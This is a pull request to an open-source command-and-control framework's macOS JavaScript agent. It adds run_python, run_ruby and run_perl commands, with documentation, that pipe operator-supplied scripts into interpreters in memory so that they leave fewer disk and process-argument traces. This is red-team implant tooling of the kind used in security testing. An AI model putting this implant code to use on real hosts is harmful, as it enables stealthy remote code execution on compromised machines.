### PR TITLE
Add commands run_python, run_ruby, and run_perl to spawn and execute scripts for interpreters in memory

### DIFF
--- a/Payload_Type/apfell/apfell/agent_code/run_perl.js
+++ b/Payload_Type/apfell/apfell/agent_code/run_perl.js
@@ -1,41 +1,40 @@
-exports.runPython = function(task, command, params){
+exports.run_perl = function(task, command, params){
     //Parse JSON to retrieve input
-    let pythonscript = "";
+    let perlscript = "";
     try {
     let config = JSON.parse(params);
-        let old_script_exists = jsimport === "";
         if(config.hasOwnProperty("script")){
-            let python_data = C2.upload(task, config['script']);
-            if(typeof python_data === "string"){
+            let perl_data = C2.upload(task, config['script']);
+            if(typeof perl_data === "string"){
                 return{"user_output":"Failed to get contents of file", "completed": true, "status": "error"};
             }
-            pythonscript = $.NSString.alloc.initWithDataEncoding(python_data, $.NSUTF8StringEncoding);
+            perlscript = $.NSString.alloc.initWithDataEncoding(perl_data, $.NSUTF8StringEncoding);
         }
         else{
             return {"user_output":"Need to supply a valid file to download", "completed": true, "status": "error"};
         }
-        let pythonData = pythonscript.dataUsingEncoding($.NSUTF8StringEncoding);
+        let perlData = perlscript.dataUsingEncoding($.NSUTF8StringEncoding);
             // Prepare NSTask
-            let pythontask = $.NSTask.alloc.init;
-            pythontask.setLaunchPath("/usr/bin/python3");
+            let perltask = $.NSTask.alloc.init;
+            perltask.setLaunchPath("/usr/bin/perl");
             
             // Set up input and output pipes
             const inputPipe = $.NSPipe.pipe;
             const outputPipe = $.NSPipe.pipe;
             const errorPipe = $.NSPipe.pipe;
             
-            pythontask.setStandardInput(inputPipe);
-            pythontask.setStandardOutput(outputPipe);
-            pythontask.setStandardError(errorPipe);
+            perltask.setStandardInput(inputPipe);
+            perltask.setStandardOutput(outputPipe);
+            perltask.setStandardError(errorPipe);
             
             // Write input to the process
             const inputHandle = inputPipe.fileHandleForWriting;
-            inputHandle.writeData(pythonData);
+            inputHandle.writeData(perlData);
             inputHandle.closeFile;
             
             // Launch task
-            pythontask.launch;  
-            pythontask.waitUntilExit;
+            perltask.launch;  
+            perltask.waitUntilExit;
             
             // Read output
             const outputHandle = outputPipe.fileHandleForReading;
@@ -45,10 +44,10 @@ exports.runPython = function(task, command, params){
             const outputString = $.NSString.alloc.initWithDataEncoding(outputData, $.NSUTF8StringEncoding);
             const errorString = $.NSString.alloc.initWithDataEncoding(errorData, $.NSUTF8StringEncoding);
             // Aggregate Response
-            let response1py = ObjC.unwrap(outputString);
-            let response2py = ObjC.unwrap(errorString);
-            let responsepy = response1py + response2py;
-            return {"user_output":responsepy, "completed": true};
+            let response1pe = ObjC.unwrap(outputString);
+            let response2pe = ObjC.unwrap(errorString);
+            let responsepe = response1pe + response2pe;
+            return {"user_output":responsepe, "completed": true};
      }catch(error){
         return {"user_output":error.toString(), "completed": true, "status": "error"};
     }

--- a/Payload_Type/apfell/apfell/agent_code/run_python.js
+++ b/Payload_Type/apfell/apfell/agent_code/run_python.js
@@ -1,0 +1,54 @@
+exports.run_python = function(task, command, params){
+    //Parse JSON to retrieve input
+    let pythonscript = "";
+    try {
+    let config = JSON.parse(params);
+        if(config.hasOwnProperty("script")){
+            let python_data = C2.upload(task, config['script']);
+            if(typeof python_data === "string"){
+                return{"user_output":"Failed to get contents of file", "completed": true, "status": "error"};
+            }
+            pythonscript = $.NSString.alloc.initWithDataEncoding(python_data, $.NSUTF8StringEncoding);
+        }
+        else{
+            return {"user_output":"Need to supply a valid file to download", "completed": true, "status": "error"};
+        }
+        let pythonData = pythonscript.dataUsingEncoding($.NSUTF8StringEncoding);
+            // Prepare NSTask
+            let pythontask = $.NSTask.alloc.init;
+            pythontask.setLaunchPath("/usr/bin/python3");
+            
+            // Set up input and output pipes
+            const inputPipe = $.NSPipe.pipe;
+            const outputPipe = $.NSPipe.pipe;
+            const errorPipe = $.NSPipe.pipe;
+            
+            pythontask.setStandardInput(inputPipe);
+            pythontask.setStandardOutput(outputPipe);
+            pythontask.setStandardError(errorPipe);
+            
+            // Write input to the process
+            const inputHandle = inputPipe.fileHandleForWriting;
+            inputHandle.writeData(pythonData);
+            inputHandle.closeFile;
+            
+            // Launch task
+            pythontask.launch;  
+            pythontask.waitUntilExit;
+            
+            // Read output
+            const outputHandle = outputPipe.fileHandleForReading;
+            const errorHandle = errorPipe.fileHandleForReading;
+            const outputData = outputHandle.readDataToEndOfFile;
+            const errorData = errorHandle.readDataToEndOfFile; 
+            const outputString = $.NSString.alloc.initWithDataEncoding(outputData, $.NSUTF8StringEncoding);
+            const errorString = $.NSString.alloc.initWithDataEncoding(errorData, $.NSUTF8StringEncoding);
+            // Aggregate Response
+            let response1py = ObjC.unwrap(outputString);
+            let response2py = ObjC.unwrap(errorString);
+            let responsepy = response1py + response2py;
+            return {"user_output":responsepy, "completed": true};
+     }catch(error){
+        return {"user_output":error.toString(), "completed": true, "status": "error"};
+    }
+}

--- a/Payload_Type/apfell/apfell/agent_code/run_ruby.js
+++ b/Payload_Type/apfell/apfell/agent_code/run_ruby.js
@@ -1,9 +1,8 @@
-exports.runRuby = function(task, command, params){
+exports.run_ruby = function(task, command, params){
     //Parse JSON to retrieve input
     let rubyscript = "";
     try {
     let config = JSON.parse(params);
-        let old_script_exists = jsimport === "";
         if(config.hasOwnProperty("script")){
             let ruby_data = C2.upload(task, config['script']);
             if(typeof ruby_data === "string"){

--- a/Payload_Type/apfell/apfell/agent_functions/run_perl.py
+++ b/Payload_Type/apfell/apfell/agent_functions/run_perl.py
@@ -11,7 +11,7 @@ class RunArguments(TaskArguments):
                 cli_name="script", 
                 display_name="Script to Run", 
                 type=ParameterType.File, 
-                description="Select ruby script to run",
+                description="Select perl script to run",
                 parameter_group_info=[ 
                     ParameterGroupInfo(
                         required=True,
@@ -31,15 +31,19 @@ class RunArguments(TaskArguments):
 
 
 class RunCommand(CommandBase):
-    cmd = "runRuby"
+    cmd = "run_perl"
     needs_admin = False
-    help_cmd = "runRuby"
-    description = "The command uses the ObjectiveC bridge to spawn ruby interactively and capture standard input. The supplied script is passed to the new ruby process, evaluated, and the output is returned."
+    help_cmd = "run_perl"
+    description = "The command uses the ObjectiveC bridge to spawn perl and capture standard input. The supplied script is passed to the new perl process, evaluated, and the output is returned."
     version = 1
     supported_ui_features = ["file_browser:upload"]
     author = "@robot"
     attackmapping = ["T1059"]
     argument_class = RunArguments
+    attributes = CommandAttributes(
+        supported_os=[SupportedOS.MacOS],
+        load_only=True,
+    )
 
     async def create_go_tasking(self, taskData: MythicCommandBase.PTTaskMessageAllData) -> MythicCommandBase.PTTaskCreateTaskingMessageResponse:
         response = MythicCommandBase.PTTaskCreateTaskingMessageResponse(
@@ -48,7 +52,7 @@ class RunCommand(CommandBase):
         )
         await SendMythicRPCArtifactCreate(MythicRPCArtifactCreateMessage(
             TaskID=taskData.Task.ID,
-            ArtifactMessage=f"/usr/bin/ruby -",
+            ArtifactMessage=f"/usr/bin/perl",
             BaseArtifactType="Process Create"
         ))
         return response

--- a/Payload_Type/apfell/apfell/agent_functions/run_python.py
+++ b/Payload_Type/apfell/apfell/agent_functions/run_python.py
@@ -1,0 +1,62 @@
+from mythic_container.MythicCommandBase import *
+import json
+from mythic_container.MythicRPC import *
+
+class RunArguments(TaskArguments):
+    def __init__(self, command_line, **kwargs):
+        super().__init__(command_line, **kwargs)
+        self.args = [
+            CommandParameter(
+                name="script", 
+                cli_name="script", 
+                display_name="Script to Run", 
+                type=ParameterType.File, 
+                description="Select python3 script to run",
+                parameter_group_info=[ 
+                    ParameterGroupInfo(
+                        required=True,
+                        group_name="Default",
+                        ui_position=0
+                    )
+                ]
+            ),
+        ]
+
+    async def parse_arguments(self):
+        if len(self.command_line) == 0:
+            raise ValueError("Must supply arguments")
+
+    async def parse_dictionary(self, dictionary_arguments):
+        self.load_args_from_dictionary(dictionary_arguments)
+
+
+class RunCommand(CommandBase):
+    cmd = "run_python"
+    needs_admin = False
+    help_cmd = "run_python"
+    description = "The command uses the ObjectiveC bridge to spawn python3 and capture standard input. The supplied script is passed to the new python process, evaluated, and the output is returned."
+    version = 1
+    supported_ui_features = ["file_browser:upload"]
+    author = "@robot"
+    attackmapping = ["T1059"]
+    argument_class = RunArguments
+    attributes = CommandAttributes(
+        supported_os=[SupportedOS.MacOS],
+        load_only=True,
+    )
+
+    async def create_go_tasking(self, taskData: MythicCommandBase.PTTaskMessageAllData) -> MythicCommandBase.PTTaskCreateTaskingMessageResponse:
+        response = MythicCommandBase.PTTaskCreateTaskingMessageResponse(
+            TaskID=taskData.Task.ID,
+            Success=True,
+        )
+        await SendMythicRPCArtifactCreate(MythicRPCArtifactCreateMessage(
+            TaskID=taskData.Task.ID,
+            ArtifactMessage=f"/usr/bin/python3",
+            BaseArtifactType="Process Create"
+        ))
+        return response
+
+    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:
+        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)
+        return resp

--- a/Payload_Type/apfell/apfell/agent_functions/run_ruby.py
+++ b/Payload_Type/apfell/apfell/agent_functions/run_ruby.py
@@ -11,7 +11,7 @@ class RunArguments(TaskArguments):
                 cli_name="script", 
                 display_name="Script to Run", 
                 type=ParameterType.File, 
-                description="Select python3 script to run",
+                description="Select ruby script to run",
                 parameter_group_info=[ 
                     ParameterGroupInfo(
                         required=True,
@@ -31,10 +31,10 @@ class RunArguments(TaskArguments):
 
 
 class RunCommand(CommandBase):
-    cmd = "runPython"
+    cmd = "run_ruby"
     needs_admin = False
-    help_cmd = "runPython"
-    description = "The command uses the ObjectiveC bridge to spawn python3 interactively and capture standard input. The supplied script is passed to the new python process, evaluated, and the output is returned."
+    help_cmd = "run_ruby"
+    description = "The command uses the ObjectiveC bridge to spawn ruby and capture standard input. The supplied script is passed to the new ruby process, evaluated, and the output is returned."
     version = 1
     supported_ui_features = ["file_browser:upload"]
     author = "@robot"
@@ -52,7 +52,7 @@ class RunCommand(CommandBase):
         )
         await SendMythicRPCArtifactCreate(MythicRPCArtifactCreateMessage(
             TaskID=taskData.Task.ID,
-            ArtifactMessage=f"/usr/bin/python3",
+            ArtifactMessage=f"/usr/bin/ruby -",
             BaseArtifactType="Process Create"
         ))
         return response

--- a/documentation-payload/apfell/commands/run_perl.md
+++ b/documentation-payload/apfell/commands/run_perl.md
@@ -1,0 +1,70 @@
++++
+title = "run_perl"
+chapter = false
+weight = 100
+hidden = false
++++
+
+## Summary
+
+The command uses the ObjectiveC bridge to spawn perl the same as when it is launched interactively and capture standard input. The supplied script is passed to the new perl process, evaluated, and the output is returned. It is not interactive and does not go through a shell, so be sure scripts do not prompt for inputs.
+     
+- Needs Admin: False  
+- Version: 1  
+- Author: @robot  
+
+### Arguments
+
+#### script
+
+- Description: Perl script to be run   
+- Required Value: True  
+- Default Value: None  
+
+## Usage
+
+```
+run_perl
+```
+
+## MITRE ATT&CK Mapping
+
+- T1059  
+## Detailed Summary
+```JavaScript
+// Prepare NSTask
+let perltask = $.NSTask.alloc.init;
+perltask.setLaunchPath("/usr/bin/perl");
+            
+// Set up input and output pipes
+const inputPipe = $.NSPipe.pipe;
+const outputPipe = $.NSPipe.pipe;
+const errorPipe = $.NSPipe.pipe;
+            
+perltask.setStandardInput(inputPipe);
+perltask.setStandardOutput(outputPipe);
+perltask.setStandardError(errorPipe);
+            
+// Write input to the process
+const inputHandle = inputPipe.fileHandleForWriting;
+inputHandle.writeData(perlData);
+inputHandle.closeFile;
+            
+// Launch task
+perltask.launch;  
+perltask.waitUntilExit;
+            
+// Read output
+const outputHandle = outputPipe.fileHandleForReading;
+const errorHandle = errorPipe.fileHandleForReading;
+const outputData = outputHandle.readDataToEndOfFile;
+const errorData = errorHandle.readDataToEndOfFile; 
+const outputString = $.NSString.alloc.initWithDataEncoding(outputData, $.NSUTF8StringEncoding);
+const errorString = $.NSString.alloc.initWithDataEncoding(errorData, $.NSUTF8StringEncoding);
+
+// Aggregate Response
+let response1pe = ObjC.unwrap(outputString);
+let response2pe = ObjC.unwrap(errorString);
+let responsepe = response1pe + response2pe;
+return {"user_output":responsepe, "completed": true};
+```

--- a/documentation-payload/apfell/commands/run_python.md
+++ b/documentation-payload/apfell/commands/run_python.md
@@ -1,0 +1,70 @@
++++
+title = "run_python"
+chapter = false
+weight = 100
+hidden = false
++++
+
+## Summary
+
+The command uses the ObjectiveC bridge to spawn python3 the same as when it is launched interactively and capture standard input. The supplied script is passed to the new python process, evaluated, and the output is returned. It is not interactive and does not go through a shell, so be sure scripts do not prompt for inputs. The command calls /usr/bin/python3, so it will not support another version of installed python and packages if it does not exist at that path.
+     
+- Needs Admin: False  
+- Version: 1  
+- Author: @robot  
+
+### Arguments
+
+#### script
+
+- Description: Python script to be run   
+- Required Value: True  
+- Default Value: None  
+
+## Usage
+
+```
+run_python
+```
+
+## MITRE ATT&CK Mapping
+
+- T1059  
+## Detailed Summary
+```JavaScript
+// Prepare NSTask
+let pythontask = $.NSTask.alloc.init;
+pythontask.setLaunchPath("/usr/bin/python3");
+            
+// Set up input and output pipes
+const inputPipe = $.NSPipe.pipe;
+const outputPipe = $.NSPipe.pipe;
+const errorPipe = $.NSPipe.pipe;
+            
+pythontask.setStandardInput(inputPipe);
+pythontask.setStandardOutput(outputPipe);
+pythontask.setStandardError(errorPipe);
+            
+// Write input to the process
+const inputHandle = inputPipe.fileHandleForWriting;
+inputHandle.writeData(pythonData);
+inputHandle.closeFile;
+            
+// Launch task
+pythontask.launch;  
+pythontask.waitUntilExit;
+            
+// Read output
+const outputHandle = outputPipe.fileHandleForReading;
+const errorHandle = errorPipe.fileHandleForReading;
+const outputData = outputHandle.readDataToEndOfFile;
+const errorData = errorHandle.readDataToEndOfFile; 
+const outputString = $.NSString.alloc.initWithDataEncoding(outputData, $.NSUTF8StringEncoding);
+const errorString = $.NSString.alloc.initWithDataEncoding(errorData, $.NSUTF8StringEncoding);
+
+// Aggregate Response
+let response1py = ObjC.unwrap(outputString);
+let response2py = ObjC.unwrap(errorString);
+let responsepy = response1py + response2py;
+return {"user_output":responsepy, "completed": true};
+```

--- a/documentation-payload/apfell/commands/run_ruby.md
+++ b/documentation-payload/apfell/commands/run_ruby.md
@@ -1,0 +1,71 @@
++++
+title = "run_ruby"
+chapter = false
+weight = 100
+hidden = false
++++
+
+## Summary
+
+The command uses the ObjectiveC bridge to spawn ruby the same as when it is launched interactively and capture standard input. The supplied script is passed to the new ruby process, evaluated, and the output is returned. It is not interactive and does not go through a shell, so be sure scripts do not prompt for inputs.
+     
+- Needs Admin: False  
+- Version: 1  
+- Author: @robot  
+
+### Arguments
+
+#### script
+
+- Description: Ruby script to be run   
+- Required Value: True  
+- Default Value: None  
+
+## Usage
+
+```
+run_ruby
+```
+
+## MITRE ATT&CK Mapping
+
+- T1059  
+## Detailed Summary
+```JavaScript
+// Prepare NSTask
+let rubytask = $.NSTask.alloc.init;
+rubytask.setLaunchPath("/usr/bin/ruby");
+rubytask.setArguments(["-"]);
+            
+// Set up input and output pipes
+const inputPipe = $.NSPipe.pipe;
+const outputPipe = $.NSPipe.pipe;
+const errorPipe = $.NSPipe.pipe;
+            
+rubytask.setStandardInput(inputPipe);
+rubytask.setStandardOutput(outputPipe);
+rubytask.setStandardError(errorPipe);
+            
+// Write input to the process
+const inputHandle = inputPipe.fileHandleForWriting;
+inputHandle.writeData(rubyData);
+inputHandle.closeFile;
+            
+// Launch task
+rubytask.launch;  
+rubytask.waitUntilExit;
+            
+// Read output
+const outputHandle = outputPipe.fileHandleForReading;
+const errorHandle = errorPipe.fileHandleForReading;
+const outputData = outputHandle.readDataToEndOfFile;
+const errorData = errorHandle.readDataToEndOfFile; 
+const outputString = $.NSString.alloc.initWithDataEncoding(outputData, $.NSUTF8StringEncoding);
+const errorString = $.NSString.alloc.initWithDataEncoding(errorData, $.NSUTF8StringEncoding);
+
+// Aggregate Response
+let response1 = ObjC.unwrap(outputString);
+let response2 = ObjC.unwrap(errorString);
+let response = response1 + response2;
+return {"user_output":response, "completed": true};
+```


### PR DESCRIPTION
Added the listed commands to spawn scripting interpreters and pass supplied scripts to standard input in memory avoiding the need to write files to disk or pass script content in process creation calls. The calling code has been surrounded in try/catch statements following a similar format to what was present for other apfell commands. Command documentation has been added for each new command. Currently the additions only support dictionary inputs from the mythic UI using the modal. 